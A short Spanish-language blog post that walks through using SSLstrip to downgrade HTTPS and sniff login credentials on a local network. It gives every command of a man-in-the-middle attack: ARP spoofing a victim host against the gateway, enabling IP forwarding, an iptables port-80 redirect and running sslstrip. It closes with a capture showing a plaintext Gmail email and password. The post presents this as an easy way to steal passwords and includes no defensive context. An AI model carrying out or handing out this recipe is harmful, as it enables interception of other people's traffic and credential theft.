HTTPS se considera uno de los protocolos de envío de información por web más seguros, sin embargo y como se suele decir, no es oro todo lo que reluce. En este post voy a presentar una herramienta, SSLstrip, que permite justamente hacer eso, destripar una conexión HTTPS y conseguir ver el contenido transmitido en texto plano.
SSLstrip permite sniffar usuarios y contraseñas transmitidas por HTTPS de forma sencilla. Para realizar el ataque se usará la técnica man-in-the-middle (MITM). Haremos que todo el tráfico pase por un equipo intermedio, que se encargará de pasar todas las contraseñas a texto plano. Hay que decir que este tipo de ataques son efectivos únicamente en ataques MITM. Para realizarlo, desde nuestro equipo, podemos seguir estos sencillos pasos.
- Descargamos la última versión de SSLstrip
shell> wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
- Descomprimimos y vamos a la carpeta
shell> tar zxvf sslstrip-0.9.tar.gz shell> cd sslstrip-0.9/
- Activamos el IP forwarding de nuestra máquina, para un MITM
shell> echo "1" > /proc/sys/net/ipv4/ip_forward
- Hacemos de nuestra máquina el router de salida a la red
shell> arpspoof -i eth0 -t 192.168.1.33 192.168.1.1
- Redireccionamos los puertos necesarios
shell> iptables -t nat -A PREROUTING \ -p tcp --destination-port 80 \ -j REDIRECT --to-ports 10000
- Ejecutamos SSLstrip
shell> ./sslstrip.py -w captura.cap
- Observamos lo que va capturando
shell> tail -f captura.cap 2010-09-28 01:35:046,739 SECURE POST Data (www.google.com): ltmpl=default<mplcache=2&continue=http%3A%2F%2Fm ail.google.com%2Fmail%2F%3F&service=mail&rm=false& dsh=6669774865561864179<mpl=default<mpl=defaul t&scc=1&timeStmp=&secTok=&GALX=dPSLG5jykg8&Email=user_prueba&Passwd=mi_passwd&rmShown=1&signIn=Acceder&asts=